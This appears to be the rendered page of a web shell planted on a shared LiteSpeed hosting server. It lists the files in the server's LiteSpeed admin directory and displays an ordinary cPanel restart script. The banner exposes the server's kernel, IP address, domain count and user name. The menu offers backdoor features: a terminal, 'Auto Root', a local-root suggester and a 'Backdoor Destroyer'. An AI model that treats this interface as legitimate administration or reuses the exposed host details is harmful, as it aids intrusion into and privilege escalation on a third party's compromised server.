Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
lsws /
admin /
misc /
Delete
Unzip
Name
Size
Permission
Date
Action
admpass.sh
1.17
KB
-r-xr-xr-x
2026-09-04 10:51
ap_lsws.sh
1.82
KB
-rwxr-xr-x
2026-09-14 07:39
ap_lsws.sh.in
1.82
KB
-r-xr-xr-x
2026-09-04 10:51
awstats_install.sh
2.06
KB
-r-xr-xr-x
2026-09-04 10:51
build_ap_wrapper.sh
624
B
-r-xr-xr-x
2026-09-04 10:51
chroot.sh
7.31
KB
-r-xr-xr-x
2026-09-04 10:51
cleancache.sh
1.46
KB
-r-xr-xr-x
2026-09-04 10:51
cleanlitemage.sh
2.4
KB
-r-xr-xr-x
2026-09-04 10:51
cp_switch_ws.sh
22.12
KB
-r-xr-xr-x
2026-09-04 10:51
cpanel_restart_httpd.in
732
B
-r-xr-xr-x
2026-09-04 10:51
create_admin_keypair.sh
336
B
-r-xr-xr-x
2026-09-04 10:51
enable_ruby_python_selector.sh
4.12
KB
-r-xr-xr-x
2026-09-04 10:51
fix_cagefs.sh
766
B
-r-xr-xr-x
2026-09-04 10:51
fp_install.sh
1.65
KB
-r-xr-xr-x
2026-09-04 10:51
gdb-bt
25
B
-rw-r--r--
2026-09-04 10:51
genjCryptionKeyPair.php
6.43
KB
-rw-r--r--
2026-09-04 10:51
gzipStatic.sh
272
B
-r-xr-xr-x
2026-09-04 10:51
htpasswd.php
103
B
-rw-r--r--
2026-09-04 10:51
lscmctl
16.05
KB
-rwxrwxr-x
2026-06-19 06:27
lshttpd.service
658
B
-r-xr-xr-x
2026-09-04 10:51
lsup.sh
5.65
KB
-r-xr-xr-x
2026-09-04 10:51
lsup6.sh
5.65
KB
-r-xr-xr-x
2026-09-04 10:51
lsws.rc
1.78
KB
-r-xr-xr-x
2026-09-04 10:51
lsws.rc.gentoo
441
B
-r-xr-xr-x
2026-09-04 10:51
mgr_ver.sh
1.93
KB
-r-xr-xr-x
2026-09-04 10:51
php.ini
37.11
KB
-rw-r--r--
2026-09-04 10:51
purge_cache_by_url
3.23
KB
-r-xr-xr-x
2026-09-04 10:51
rc-inst.sh
5.99
KB
-r-xr-xr-x
2026-09-04 10:51
rc-uninst.sh
4.61
KB
-r-xr-xr-x
2026-09-04 10:51
uninstall.sh
2.9
KB
-r-xr-xr-x
2026-09-04 10:51
update.sh
1.85
KB
-r-xr-xr-x
2026-09-04 10:51
Save
Rename
#!/bin/sh LS_PID="" LS_CONF=%LSWS_HOME%/conf/httpd_config.xml if [ "x$1" == "x--restart" ] || [ "x$1" == "x" ]; then if [ -f '/tmp/lshttpd/lshttpd.pid' ]; then LSPID=`cat /tmp/lshttpd/lshttpd.pid` kill -0 $LSPID if [ $? -eq 0 ]; then touch /var/run/restartsrv_httpd.lock service lsws restart unlink /var/run/restartsrv_httpd.lock fi fi PORT_OFFSET_CONF=`grep apachePortOffset "$LS_CONF"` PORT_OFFSET=`expr "$PORT_OFFSET_CONF" : '.*<apachePortOffset>\(.*\)</apachePortOffset>'` if [ "x$PORT_OFFSET" != 'x' ] && [ "$PORT_OFFSET" -ne 0 ]; then /scripts/restartsrv_httpd_ls_bak $@ fi else /scripts/restartsrv_httpd_ls_bak $@ fi